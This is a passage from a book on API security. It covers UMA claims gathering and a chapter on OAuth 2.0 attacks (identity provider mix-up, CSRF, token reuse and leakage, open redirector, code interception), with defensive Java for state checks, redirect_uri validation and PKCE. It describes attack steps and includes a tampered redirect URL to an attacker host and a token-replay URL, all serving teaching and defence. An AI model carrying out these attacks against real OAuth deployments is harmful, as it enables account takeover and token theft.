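    private final HttpClient http = HttpClient.newHttpClient();

    // Validates the requesting party token (RPT) presented by the PFM application,
    // as in step 10 of the walkthrough. The PAT authenticates the resource server
    // to the introspection endpoint.
    public boolean isRptValid(String rpt, String pat) throws Exception {
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create(INTROSPECTION_ENDPOINT))
                .header("Authorization", "Bearer " + pat)
                .header("Content-Type", "application/x-www-form-urlencoded")
                .POST(HttpRequest.BodyPublishers.ofString("token=" + rpt))
                .build();

        HttpResponse<String> response =
                http.send(request, HttpResponse.BodyHandlers.ofString());

        // For brevity, only the active flag is checked here; a real implementation
        // would parse the JSON and verify scope and aud as well.
        return response.statusCode() == 200
                && response.body().contains("\"active\": true");
    }
}
```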
Note: A recording of a UMA 2.0 demo done by the author of the book for the UMA working group with the open source WSO2 Identity Server is available here: www.youtube.com/watch?v=66aGc5AV7P4.

Interactive Claims Gathering

In the previous section, in step 7, we assumed that the requesting party is already logged in to the client application and the client application knows about the requesting party's claims, say, for example, in the format of an ID token or a SAML token. The client application passes these claims in the claim_token parameter along with the permission ticket to the token endpoint of the authorization server. This request from the client application to the authorization server is a direct request. In case the client application finds that it does not have enough claims that are required by the authorization server to make an authorization decision based on its policies, the client application can decide to use interactive claim gathering. During the interactive claim gathering, the client application redirects the requesting party to the UMA authorization server. This is what we discussed under the second use case at the very beginning of the chapter, with respect to sharing Google Docs with external companies. The following is a sample request the client application generates to redirect the requesting party to the authorization server.

Host: as.uma.example.com
GET /uma/rqp_claims?client_id=$APP_CLIENTID
&ticket=$TICKET
&claims_redirect_uri=https://client.example.com/redirect_claims
&state=abc

The preceding sample request is an HTTP redirect, which flows through the browser. Here the $APP_CLIENTID is the OAuth 2.0 client id you get at the time you register your application with the UMA authorization server, and $TICKET is a placeholder for the permission ticket the client application gets from the resource server (see step 6 in the previous section). The value of claims_redirect_uri tells the authorization server where to send the response back, and it points to an endpoint hosted in the client application. How the authorization server does claim gathering is out of the scope of the UMA specification. Ideally, it can be by redirecting the requesting party again to his/her own home identity provider and getting back the requested claims (see Figure 13-2). Once the claim gathering is completed, the authorization server redirects the user back to the claims_redirect_uri endpoint with a permission ticket, as shown in the following. The authorization server tracks all the claims it gathered against this permission ticket.

HTTP/1.1 302 Found
Location: https://client.example.com/redirect_claims?ticket=cHJpdmFjeSBpcyBjb250ZXh0LCBjb250cm9s&state=abc

The client application will now talk to the token endpoint of the authorization server with the preceding permission ticket to get a requesting party token (RPT). This is similar to what we discussed under step 7 in the previous section, but here we do not send a claim_token.
\> curl -v -X POST --basic -u $APP_CLIENTID:$APP_CLIENTSECRET -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -k -d "grant_type=urn:ietf:params:oauth:grant-type:uma-ticket& ticket=$TICKET" https://as.uma.example.com/uma/token As the response to the preceding request, the client application gets an access token, which UMA calls a requesting party token (RPT), and before authorization server Chapter 13 User-Managed aCCess 286 returns back the access token, it internally evaluates any authorization policies defined by the account owner (or the resource owner) to see whether Peter has access to the corresponding bank account. { "token_type":"bearer", "expires_in":3600, "refresh_token":"22b157546b26c2d6c0165c4ef6b3f736", "access_token":"cac93e1d29e45bf6d84073dbfb460" } Summary • User-Managed Access (UMA) is an emerging standard built on top of the OAuth 2.0 core specification as a profile. • UMA still has very few vendor implementations, but it promises to be a highly recognized standard in the near future. • There are two specifications developed under Kantara Initiative, which define the UMA protocol. The core specification is called the UMA 2.0 Grant for OAuth 2.0 Authorization. The other one is the Federated Authorization for UMA 2.0, which is optional. • UMA introduces a new role called, requesting party, in addition to the four roles used in OAuth 2.0: the authorization server, the resource server, the resource owner and the client application. Chapter 13 User-Managed aCCess 287 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_14 CHAPTER 14 OAuth 2.0 Security OAuth 2.0 is an authorization framework, as you know already. Being a framework, it gives multiple options for application developers. It is up to the application developers to pick the right options based on their use cases and how they want to use OAuth 2.0. There are few guideline documents to help you use OAuth 2.0 in a secure way. OAuth 2.0 Threat Model and Security Considerations (RFC 6819) produced by OAuth IETF working group defines additional security considerations for OAuth 2.0, beyond those in the OAuth 2.0 specification, based on a comprehensive threat model. The OAuth 2.0 Security Best Current Practice document, which is a draft proposal at the time of writing, talks about new threats related to OAuth 2.0, since the RFC 6819 was published. Also, the Financial-grade API (FAPI) working group under the OpenID foundation has published a set of guidelines on how to use OAuth 2.0 in a secure way to build financial grade applications. In this chapter, we go through a set of possible attacks against OAuth 2.0 and discuss how to mitigate those. Identity Provider Mix-Up Even though OAuth 2.0 is about access delegation, still people work around it to make it work for login. That’s how login with Facebook works. Then again, the OpenID Connect (see Chapter 6), which is built on top of OAuth 2.0, is the right way of using OAuth 2.0 for authentication. A recent research done by one of the leading vendors in the Identity and Access Management domain confirmed that most of the new development happened over the past few years at the enterprise level picked OAuth 2.0/OpenID Connect over SAML 2.0. All in all, OAuth 2.0 security is a hot topic. In 2016, Daniel Fett, Ralf Küsters, and Guido Schmitz did a research on OAuth 2.0 security and published a paper.1 Identity provider mix-up is one of the attacks highlighted in their paper. 
Identity provider is in 1 A Comprehensive Formal Security Analysis of OAuth 2.0, https://arxiv.org/pdf/1601.01229.pdf 288 fact the entity that issues OAuth 2.0 tokens or the OAuth 2.0 authorization server, which we discussed in Chapter 4. Let’s try to understand how identity provider mix-up works (see Figure 14-1): 1. This attack happens with an OAuth 2.0 client application, which provides multiple identity provider (IdP) options for login. Let’s say foo.idp and evil.idp. We assume that the client application does not know that evil.idp is evil. Also it can be a case where evil. idp is a genuine identity provider, which could possibly be under an attack itself. 2. The victim picks foo.idp from the browser and the attacker intercepts the request and changes the selection to evil.idp. Here we assume the communication between the browser and the client application is not protected with Transport Layer Security (TLS). The OAuth 2.0 specification does not talk about it, and it’s purely up to the web application developers. Since there is no confidential data passed in this flow, most of the time the web application developers may not worry about using TLS. At the same time, there were few vulnerabilities discovered over the past on TLS implementations (mostly openssl). So, the attacker could possibly use such vulnerabilities to intercept the communication between the browser and the client application (web server), even if TLS is used. Chapter 14 Oauth 2.0 SeCurity 289 3. Since the attacker changed the identity provider selection of the user, the client application thinks it’s evil.idp (even though the user picked foo.idp) and redirects the user to evil.idp. The client application only gets the modified request from the attacker, who intercepted the communication. 4. The attacker intercepts the redirection and modifies the redirection to go to the foo.idp. The way redirection works is the web server (in this case, the client application) sends back a response to the browser with a 302 status code—and with an HTTP Location header. If the communication between the browser and the client application is not on TLS, then this response is not protected, even if the HTTP Location header contains an HTTPS URL. Since we assumed already, the communication between the browser and the client application can be intercepted by the attacker, then the attacker can modify the Location header in the response to go to the foo.idp—which is the original selection—and no surprise to the user. Figure 14-1. Identity provider mix-up attack Chapter 14 Oauth 2.0 SeCurity 290 5. The client application gets either the code or the token (based on the grant type) and now will talk to the evil.idp to validate it. The authorization server (or the identity provider) will send back the authorization code (if the code grant type is used) to the callback URL, which is under the client application. Just looking at the authorization code, the client application cannot decide to which identity provider the code belongs to. So we assume it tracks the identity provider by some session variable—so as per step 3, the client application thinks it’s the evil.idp and talks to the evil.idp to validate the token. 6. The evil.idp gets hold of the user’s access token or the authorization code from the foo.idp. If it’s the implicit grant type, then it would be the access token, otherwise the authorization code. 
In mobile apps, most of the time, people used to embed the same client id and the client secret into all the instances—so an attacker having root access to his own phone can figure it out what the keys are and then, with the authorization code, can get the access token. There is no record that the preceding attack is being carried out in practice—but at the same time, we cannot totally rule it out. There are a couple of options to prevent such attacks, and our recommendation is to use the option 1 as it is quite straightforward and solves the problem without much hassle. 1. Have separate callback URLs by each identity provider. With this the client application knows to which identity provider the response belongs to. The legitimate identity provider will always respect the callback URL associated with the client application and will use that. The client application will also attach the value of the callback URL to the browser session and, once the user got redirected back, will see whether it’s on the right place (or the right callback URL) by matching with the value of the callback URL from the browser session. 2. Follow the mitigation steps defined in the IETF draft specification: OAuth 2.0 IdP Mix-Up Mitigation (https://tools.ietf. org/html/draft-ietf-oauth-mix-up-mitigation-01). This specification proposes to send a set of mitigation data from Chapter 14 Oauth 2.0 SeCurity 291 the authorization server back to the client, along with the authorization response. The mitigation data provided by the authorization server to the client includes an issuer identifier, which is used to identify the authorization server, and a client id, which is used to verify that the response is from the correct authorization server and is intended for the given client. This way the OAuth 2.0 client can verify from which authorization server it got the response back and based on that identify the token endpoint or the endpoint to validate the token. Cross-Site Request Forgery (CSRF) In general, Cross-Site Request Forgery (CSRF) attack forces a logged-in victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests, where the vulnerable application thinks are legitimate requests from the victim. OWASP (Open Web Application Security Project) identifies this as one of the key security risks in web applications in its 2017 report.2 Let’s see how CSRF can be used with OAuth 2.0 to exploit a vulnerable web application (see Figure 14-2): 1. The attacker tries to log in to the target web site (OAuth 2.0 client) with his account at the corresponding identity provider. Here we assume the attacker has a valid account at the identity provider, trusted by the corresponding OAuth 2.0 client application. 2. The attacker blocks the redirection to the target web site and captures the authorization code. The target web site never sees the code. In OAuth 2.0, the authorization code is only good enough for one-time use. In case the OAuth 2.0 client application sees it and then exchanges it to an access token, then it’s no more valid—so the attacker has to make sure that the authorization code never reaches the client application. Since the authorization code flows through the attacker’s browser to the client, it can be easily blocked. 
2 OWASP Top 10 2017, www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf

Figure 14-2. Cross-Site Request Forgery (CSRF) attack in the OAuth 2.0 code flow

3. The attacker constructs the callback URL for the target site—and makes the victim click on it. In fact, it would be the same callback URL the attacker can copy from step 2. Here the attacker can send the link to the victim's email or somehow fool him to click on the link.

4. The victim clicks on the link and logs in to the target web site, with the account attached to the attacker—and adds his/her credit card information. Since the authorization code belongs to the attacker, the victim logs in to the target web site with the attacker's account. This is a pattern many web sites follow to authenticate users with OAuth 2.0. Login with Facebook works in the same way. Once the web site gets the authorization code, it will talk to the authorization server and exchange it for an access token. Then using that access token, the web site talks to another endpoint in the authorization server to find user information. In this case, since the code belongs to the attacker, the user information returned back from the authorization server will be related to him—so the victim now logs in to the target web site with the attacker's account.

5. The attacker too logs in to the target web site with his/her valid credentials and uses the victim's credit card to purchase goods.

The preceding attack can be mitigated by following these best practices:

• Use a short-lived authorization code. Making the authorization code expire soon gives very little time for the attacker to plant an attack. For example, the authorization code issued by LinkedIn expires in 30 seconds. Ideally, the lifetime of the authorization code should be in seconds.

• Use the state parameter as defined in the OAuth 2.0 specification. This is one of the key parameters to use to mitigate CSRF attacks in general. The client application has to generate a random number (or a string) and pass it to the authorization server along with the grant request. Further, the client application has to add the generated value of the state to the current user session (browser session) before redirecting the user to the authorization server. According to the OAuth 2.0 specification, the authorization server has to return back the same state value with the authorization code to the redirect_uri (to the client application). The client must validate the state value returned from the authorization server against the value stored in the user's current session—if it mismatches, it rejects moving forward (see the sketch after this list). Going back to the attack, when the user clicks the crafted link sent to the victim by the attacker, it won't carry the same state value generated before and attached to the victim's session (or most probably the victim's session has no state value), and the attacker does not know how to generate the exact same state value. So, the attack won't be successful, and the client application will reject the request.

• Use PKCE (Proof Key for Code Exchange). PKCE (RFC 7636) was introduced to protect OAuth 2.0 client applications from the authorization code interception attack, mostly targeting native mobile apps. The use of PKCE will also protect users from CSRF attacks, once the code_verifier is attached to the user's browser session. We talked about PKCE in detail in Chapter 10.
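The following is a minimal sketch of the state parameter handling described in the second bullet above, assuming a Java servlet-based client application. The session attribute name oauth2.state and the buffer size are arbitrary choices, not anything mandated by the OAuth 2.0 specification.

```java
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;

public class StateParameterGuard {

    private static final SecureRandom RANDOM = new SecureRandom();

    // Called just before redirecting the user to the authorization server:
    // generate a random state value and bind it to the browser session.
    public static String newState(HttpSession session) {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        String state = Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
        session.setAttribute("oauth2.state", state);
        return state;
    }

    // Called at the redirect_uri (callback) endpoint: the state returned by the
    // authorization server must match the one stored in the user's session.
    public static boolean isStateValid(HttpServletRequest callbackRequest) {
        HttpSession session = callbackRequest.getSession(false);
        String expected = (session == null) ? null
                : (String) session.getAttribute("oauth2.state");
        String returned = callbackRequest.getParameter("state");
        return expected != null && expected.equals(returned);
    }
}
```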
Chapter 14 Oauth 2.0 SeCurity 294 Token Reuse OAuth 2.0 tokens are issued by the authorization server to a client application to access a resource on behalf of the resource owner. This token is to be used by the client—and the resource server will make sure it’s a valid one. What if the resource server is under the control of an attacker and wants to reuse the token sent to it to access another resource, impersonating the original client? Here the basic assumption is there are multiple resource servers, which trust the same authorization server. For example, in a microservices deployment, there can be multiple microservices protected with OAuth 2.0, which trust the same authorization server. How do we make sure at the resource server side that the provided token is only good enough to access it? One approach is to have properly scoped access tokens. The scopes are defined by the resource server—and update the authorization server. If we qualify each scope with a Uniform Resource Name (URN) specific to the corresponding resource server, then there cannot be any overlapping scopes across all the resource servers—and each resource server knows how to uniquely identify a scope corresponding to it. Before accepting a token, it should check whether the token is issued with a scope known to it. This does not completely solve the problem. If the client decides to get a single access token (with all the scopes) to access all the resources, then still a malicious client can use that access token to access another resource by impersonating the original client. To overcome this, the client can first get an access token with all the scopes, then it can exchange the access token to get multiple access tokens with different scopes, following the OAuth 2.0 Token Exchange specification (which we discussed in Chapter 9). A given resource server will only see an access token having scopes only related to that particular resource server. Let’s see another example of token reuse. Here assume that you log in to an OAuth 2.0 client application with Facebook. Now the client has an access token, which is good enough to access the user info endpoint (https://graph.facebook.com/me) of Facebook and find who the user is. This client application is under an attacker, and now the attacker tries to access another client application, which uses the implicit grant type, with the same access token, as shown in the following. https://target-app/callback?access_token=<access_token> Chapter 14 Oauth 2.0 SeCurity 295 The preceding URL will let the attacker log in to the client application as the original user unless the target client application has proper security checks in place. How do we overcome this? There are multiple options: • Avoid using OAuth 2.0 for authentication—instead use OpenID Connect. The ID token issued by the authorization server (via OpenID Connect) has an element called aud (audience)—and its value is the client id corresponding to the client application. Each application should make sure that the value of the aud is known to it before accepting the user. If the attacker tries to replay the ID token, it will not work since the audience validation will fail at the second client application (as the second application expects a different aud value). • Facebook login is not using OpenID Connect—and the preceding attack can be carried out against a Facebook application which does not have the proper implementation. There are few options introduced by Facebook to overcome the preceding threat. 
One way is to use the undocumented API, https://graph.facebook.com/ app?access_token=<access_token>, to get access token metadata. This will return back in a JSON message the details of the application which the corresponding access token is issued to. If it’s not yours, reject the request. • Use the standard token introspection endpoint of the authorization server to find the token metadata. The response will have the client_ id corresponding to the OAuth 2.0 application—and if it does not belong to you, reject the login request. There is another flavor of token reuse—rather we call it token misuse. When implicit grant type is used with a single-page application (SPA), the access token is visible to the end user—as it’s on the browser. It’s the legitimate user—so the user seeing the access token is no big deal. But the issue is the user would probably take the access token out of the browser (or the app) and automate or script some API calls, which would generate more load on the server that would not expect in a normal scenario. Also, there is a cost Chapter 14 Oauth 2.0 SeCurity 296 of making API calls. Most of the client applications are given a throttle limit—meaning a given application can only do n number of calls during a minute or some fixed time period. If one user tries to invoke APIs with a script, that could possibly eat out the complete throttle limit of the application—making an undesirable impact on the other users of the same application. To overcome such scenarios, the recommended approach is to introduce throttle limits by user by application—not just by the application. In that way, if a user wants to eat out his own throttle limit, go out and do it! The other solution is to use Token Binding, which we discussed in Chapter 11. With token binding, the access token is bound to the underlying Transport Layer Security (TLS) connection, and the user won’t be able to export it and use it from somewhere else. Token Leakage/Export More than 90% of the OAuth 2.0 deployments are based on bearer tokens—not just the public/Internet scale ones but also at the enterprise level. The use of a bearer token is just like using cash. When you buy a cup of coffee from Starbucks, paying by cash, no one will bother how you got that ten-dollar note—or if you’re the real owner of it. OAuth 2.0 bearer tokens are similar to that. If someone takes the token out of the wire (just like stealing a ten-dollar note from your pocket), he/she can use it just as the original owner of it—no questions asked! Whenever you use OAuth 2.0, it’s not just recommended but a must to use TLS. Even though TLS is used, still a man-in-the-middle attack can be carried out with various techniques. Most of the time, the vulnerabilities in TLS implementations are used to intercept the TLS-protected communication channels. The Logjam attack discovered in May 2015 allowed a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allowed the attacker to read and modify any data passed over the connection. There are few things we need to worry about as precautions to keep the attacker away from having access to the tokens: • Always be on TLS (use TLS 1.2 or later). • Address all the TLS-level vulnerabilities at the client, authorization server, and the resource server. Chapter 14 Oauth 2.0 SeCurity 297 • The token value should be >=128 bits long and constructed from a cryptographically strong random or pseudorandom number sequence. 
• Never store tokens in cleartext—but the salted hash. • Never write access/refresh tokens into logs. • Use TLS tunneling over TLS bridging. • Decide the lifetime of each token based on the risk associated with token leakage, duration of the underlying access grant (SAML grant (RFC 7522) or JWT grant (RFC 7523)), and the time required for an attacker to guess or produce a valid token. • Prevent reuse of the authorization code—just once. • Use one-time access tokens. Under the OAuth 2.0 implicit grant type, access token comes as a URI fragment—which will be in the browser history. In such cases, it can be immediately invalidated by exchanging it to a new access token from the client application (which is an SPA). • Use strong client credentials. Most of the applications just use client id and client secret to authenticate the client application to the authorization server. Rather than passing credentials over the wire, client can use either the SAML or JWT assertion to authenticate. In addition to the preceding measures, we can also cryptographically bind the OAuth 2.0 access/refresh tokens and authorization codes to a given TLS channel—so those cannot be exported and used elsewhere. There are few specifications developed under the IETF Token Binding working group to address this aspect. The Token Binding Protocol, which we discussed in Chapter 11, allows client/server applications to create long-lived, uniquely identifiable TLS bindings spanning multiple TLS sessions and connections. Applications are then enabled to cryptographically bind security tokens to the TLS layer, preventing token export and replay attacks. To protect privacy, the Token Binding identifiers are only conveyed over TLS and can be reset by the user at any time. Chapter 14 Oauth 2.0 SeCurity 298 The OAuth 2.0 Token Binding specification (which we discussed in Chapter 11) defines how to apply Token Binding to access tokens, authorization codes, and refresh tokens. This cryptographically binds OAuth tokens to a client’s Token Binding key pair, the possession of which is proven on the TLS connections over which the tokens are intended to be used. The use of Token Binding protects OAuth tokens from man-in-the- middle, token export, and replay attacks. Open Redirector An open redirector is an endpoint hosted on the resource server (or the OAuth 2.0 client application) end, which accepts a URL as a query parameter in a request—and then redirects the user to that URL. An attacker can modify the redirect_uri in the authorization grant request from the resource server to the authorization server to include an open redirector URL pointing to an endpoint owned by him. To do this, the attacker has to intercept the communication channel between the victim’s browser and the authorization server—or the victim’s browser and the resource server (see Figure 14-3). Once the request hits the authorization server and after the authentication, the user will be redirected to the provided redirect_uri, which also carries the open redirector query parameter pointing to the attacker’s endpoint. To detect any modifications to the redirect_uri, the authorization server can carry out a check against a preregistered URL. But then again, some authorization server implementations will only worry about the domain part of the URL and will ignore doing an exact one-to-one match. So, any changes to the query parameters will be unnoticed. 
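The following sketch contrasts the two validation styles just described: a lax check that only compares the scheme and the host of the redirect_uri against the preregistered value, and a strict one-to-one match. The URLs are purely illustrative.

```java
import java.net.URI;

public class RedirectUriValidator {

    // The lax check: only the scheme and host of the preregistered redirect_uri are
    // compared, so an appended open redirector query parameter goes unnoticed.
    public static boolean domainOnlyMatch(String registered, String requested) {
        URI r = URI.create(registered);
        URI q = URI.create(requested);
        return r.getScheme().equals(q.getScheme()) && r.getHost().equals(q.getHost());
    }

    // The strict check: the requested redirect_uri must match the preregistered
    // value character for character, query parameters included.
    public static boolean exactMatch(String registered, String requested) {
        return registered.equals(requested);
    }

    public static void main(String[] args) {
        String registered = "https://client.example.com/callback";
        String tampered   = "https://client.example.com/callback?redirect=https://attacker.com";

        System.out.println(domainOnlyMatch(registered, tampered)); // true  -> tampering goes unnoticed
        System.out.println(exactMatch(registered, tampered));      // false -> request rejected
    }
}
```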
Chapter 14 Oauth 2.0 SeCurity 299 Once the user got redirected to the open redirector endpoint, it will again redirect the user to the value (URL) defined in the open redirector query parameter—which will take him/her to the attacker’s endpoint. In this request to the attacker’s endpoint, the HTTP Referer header could carry some confidential data, including the authorization code (which is sent to the client application by the authorization server as a query parameter). How to prevent an open redirector attack: • Enforce strict validations at the authorization server against the redirect_uri. It can be an exact one-to-one match or regex match. • Validate the redirecting URL at open redirector and make sure you only redirect to the domains you own. Figure 14-3. Open Redirector attack Chapter 14 Oauth 2.0 SeCurity 300 • Use JWT Secured Authorization Request (JAR) or Pushed Authorization Requests (PAR) as discussed in Chapter 4 to protect the integrity of the authorization request, so the attacker won’t be able to modify the request to include the open redirector query parameter to the redirect_uri. Code Interception Attack Code interception attack could possibly happen in a native mobile app. OAuth 2.0 authorization requests from native apps should only be made through external user agents, primarily the user’s browser. The OAuth 2.0 for Native Apps specification (which we discussed in Chapter 10) explains in detail the security and usability reasons why this is the case and how native apps and authorization servers can implement this best practice. The way you do single sign-on in a mobile environment is by spinning up the system browser from your app and then initiate OAuth 2.0 flow from there. Once the authorization code is returned back to the redirect_uri (from the authorization server) on the browser, there should be a way to pass it over to the native app. This is taken care by the mobile OS—and each app has to register for a URL scheme with the mobile OS. When the request comes to that particular URL, the mobile OS will pass its control to the corresponding native app. But, the danger here is, there can be multiple apps that get registered for the same URL scheme, and there is a chance a malicious app could get hold of the authorization code. Since many mobile apps embed the same client id and client secret for all the instances of that particular app, the attacker can also find out what they are. By knowing the client id and client secret, and then having access to the authorization code, the malicious app can now get an access token on behalf of the end user. PKCE (Proof Key for Code Exchange), which we discussed in detail in Chapter 10, was introduced to mitigate such attacks. Let’s see how it works: 1. The OAuth 2.0 client app generates a random number (code_ verifier) and finds the SHA256 hash of it—which is called the code_challenge. 2. The OAuth 2.0 client app sends the code_challenge along with the hashing method in the authorization grant request to the authorization server. Chapter 14 Oauth 2.0 SeCurity 301 3. Authorization server records the code_challenge (against the issued authorization code) and replies back with the code. 4. The client sends the code_verifier along with the authorization code to the token endpoint. 5. The authorization server finds the hash of the provided code_ verifier and matches it against the stored code_challenge. If it does not match, rejects the request. 
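The following is a minimal sketch of steps 1, 2, and 5 above, using only the standard Java libraries: the client generates the code_verifier and derives the code_challenge sent with the authorization request (code_challenge_method=S256), and the authorization server later recomputes the challenge from the presented code_verifier and compares it with the recorded value. The key sizes and method names here are illustrative.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class Pkce {

    private static final SecureRandom RANDOM = new SecureRandom();
    private static final Base64.Encoder URL_ENCODER =
            Base64.getUrlEncoder().withoutPadding();

    // Step 1: the client generates a random code_verifier.
    public static String newCodeVerifier() {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        return URL_ENCODER.encodeToString(bytes);
    }

    // Steps 1 and 2: the code_challenge is the base64url-encoded SHA256 hash of
    // the code_verifier, sent along with the authorization grant request.
    public static String codeChallenge(String codeVerifier) throws Exception {
        MessageDigest sha256 = MessageDigest.getInstance("SHA-256");
        byte[] hash = sha256.digest(codeVerifier.getBytes(StandardCharsets.US_ASCII));
        return URL_ENCODER.encodeToString(hash);
    }

    // Step 5: the authorization server recomputes the challenge from the presented
    // code_verifier and compares it with the value recorded against the code.
    public static boolean verify(String codeVerifier, String storedChallenge) throws Exception {
        return codeChallenge(codeVerifier).equals(storedChallenge);
    }
}
```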
With this approach, a malicious app just having access to the authorization code cannot exchange it for an access token without knowing the value of the code_verifier.

Security Flaws in Implicit Grant Type

The OAuth 2.0 implicit grant type (see Figure 14-4) is now obsolete. It was mostly used by single-page applications and native mobile apps—but no more. In both cases, the recommendation is to use the authorization code grant type. There are a few security flaws, as listed in the following, identified in the implicit grant type, and the IETF OAuth working group officially announced that applications should not use the implicit grant type any more:

• With the implicit grant type, the access token comes as a URI fragment and remains in the web browser location bar (step 5 in Figure 14-4). Since anything the web browser has in the location bar is preserved as browser history, anyone having access to the browser history can steal the tokens.
Chapter 14 Oauth 2.0 SeCurity 304 has intentionally picked the Google Drive image there. If all these OAuth applications can go through an approval process, before launching into public, such mishaps can be prevented. Facebook already follows such a process. When you create a Facebook app, first, only the owner of the application can log in—to launch it to the public, it has to go through an approval process. G Suite is widely used in the enterprise. Google can give the domain admins more control to whitelist, which applications the domain users can access from corporate credentials. This prevents users under phishing attacks, unknowingly sharing access to important company docs with third-party apps. The phishing attack on Google is a good wake-up call to evaluate and think about how phishing resistance techniques can be occupied in different OAuth flows. For example, Google Chrome security team has put so much effort when they designed the Chrome warning page for invalid certificates. They did tons of research even to pick the color, the alignment of text, and what images to be displayed. Surely, Google will bring up more bright ideas to the table to fight against phishing. Summary • OAuth 2.0 is the de facto standard for access delegation to cater real production use cases. There is a huge ecosystem building around it— with a massive adoption rate. • Whenever you use OAuth, you should make sure that you follow and adhere to security best practices—and always use proven libraries and products, which already take care of enforcing the best practices. • OAuth 2.0 Threat Model and Security Considerations (RFC 6819) produced by OAuth IETF working group defines additional security considerations for OAuth 2.0, beyond those in the OAuth 2.0 specification, based on a comprehensive threat model. • The OAuth 2.0 Security Best Current Practice document, which is a draft proposal at the time of writing, talks about new threats related to OAuth 2.0, since the RFC 6819 was published. • The Financial-grade API (FAPI) working group under OpenID Foundation has published a set of guidelines on how to use OAuth 2.0 in a secure way to build financial-grade applications. Chapter 14 Oauth 2.0 SeCurity 305 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_15 CHAPTER 15 Patterns and Practices Throughout the book so far over 14 chapters and 7 appendices, we discussed different ways of securing APIs and the theoretical background behind those. In this chapter, we present a set of API security patterns to address some of the most common enterprise security problems. Direct Authentication with the Trusted Subsystem Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via a web application while they’re behind the company firewall. All user data are stored in Microsoft Active Directory (AD), and the web application is connected directly to the Active Directory to authenticate users. The web application passes the logged-in user’s identifier to the back-end APIs to retrieve data related to the user. The problem is straightforward, and Figure 15-1 illustrates the solution. You need to use some kind of direct authentication pattern. User authentication happens at the front- end web application, and once the user is authenticated, the web application needs to access the back-end APIs. The catch here is that the web application passes the logged-in user’s identifier to the APIs. 
That implies the web application needs to invoke APIs in a user-aware manner. Since both the web application and the APIs are in the same trust domain, we only authenticate the end user at the web application, and the back-end APIs trust whatever data is passed on to them from the web application. This is called the trusted subsystem pattern: the web application acts as a trusted subsystem. In such a case, the best way to secure the APIs is through mutual Transport Layer Security (mTLS). All the requests generated from the web application are secured with mTLS, and no one but the web application can access the APIs (see Chapter 3).

Some resist using TLS due to the overhead it adds and instead rely on building a controlled environment, where security between the web application and the container that hosts the APIs is governed at the network level. Network-level security must provide the assurance that no component other than the web application server can talk to the container that hosts the APIs. This is called the trust-the-network pattern, and over time it has become an antipattern. The opposite of the trust-the-network pattern is the zero-trust network. With the zero-trust network pattern, we do not trust the network, so we need to enforce security checks as close as possible to the resource (or, in our case, the APIs). The use of mTLS to secure the APIs is the most ideal solution here.

Figure 15-1. Direct authentication with the trusted subsystem pattern

Single Sign-On with the Delegated Access Control

Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via web applications while they're behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to an identity provider, which supports Security Assertion Markup Language (SAML) 2.0, to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user.

The catch here is the last statement: "The web applications need to access back-end APIs on behalf of the logged-in user." This suggests the need for an access delegation protocol: OAuth 2.0. However, users don't present their credentials directly to the web application—they authenticate through a SAML 2.0 identity provider. In this case, you need to find a way to exchange the SAML token the web application receives via the SAML 2.0 Web SSO protocol for an OAuth access token, which is defined in the SAML grant type for the OAuth 2.0 specification (see Chapter 12). Once the web application receives the SAML token, as shown in step 3 of Figure 15-2, it has to exchange the SAML token for an access token by talking to the OAuth 2.0 authorization server.

Figure 15-2. Single sign-on with the Delegated Access Control pattern
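That exchange can be pictured with a minimal, hypothetical request following the SAML 2.0 bearer assertion grant type for OAuth 2.0 (RFC 7522); the token endpoint host and client_id are illustrative, and the assertion parameter carries the base64url-encoded SAML assertion received in step 3:

POST /token HTTP/1.1
Host: authz.example.com
Content-Type: application/x-www-form-urlencoded

grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Asaml2-bearer
&assertion=PEFzc2VydGlvbi...(base64url-encoded SAML assertion, truncated)
&client_id=webapp1

In return, the authorization server issues a regular OAuth 2.0 access token, but, as discussed next, no refresh token.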
The authorization server must trust the SAML 2.0 identity provider. Once the web application gets the access token, it can use it to access back-end APIs. The SAML grant type for OAuth 2.0 doesn't provide a refresh token. The lifetime of the access token issued by the OAuth 2.0 authorization server must match the lifetime of the SAML token used in the authorization grant. After the user logs in to the web application with a valid SAML token, the web application creates a session for the user and, from then onward, doesn't worry about the lifetime of the SAML token. This can lead to some issues. Say, for example, the SAML token expires, but the user still has a valid browser session in the web application. Because the SAML token has expired, you can expect that the corresponding OAuth 2.0 access token obtained at the time of user login has expired as well. Now, if the web application tries to access a back-end API, the request will be rejected because the access token is expired. In such a scenario, the web application has to redirect the user back to the SAML 2.0 identity provider, get a new SAML token, and exchange that token for a new access token. If the session at the SAML 2.0 identity provider is still live, this redirection can be made transparent to the end user.

Single Sign-On with the Integrated Windows Authentication

Suppose a medium-scale enterprise has a number of APIs. Company employees are allowed to access these APIs via multiple web applications while they're behind the company firewall. All user data are stored in Microsoft Active Directory, and all the web applications are connected to a SAML 2.0 identity provider to authenticate users. The web applications need to access back-end APIs on behalf of the logged-in user. All the users are in a Windows domain, and once they're logged in to their workstations, they shouldn't be asked to provide credentials at any point for any other application.

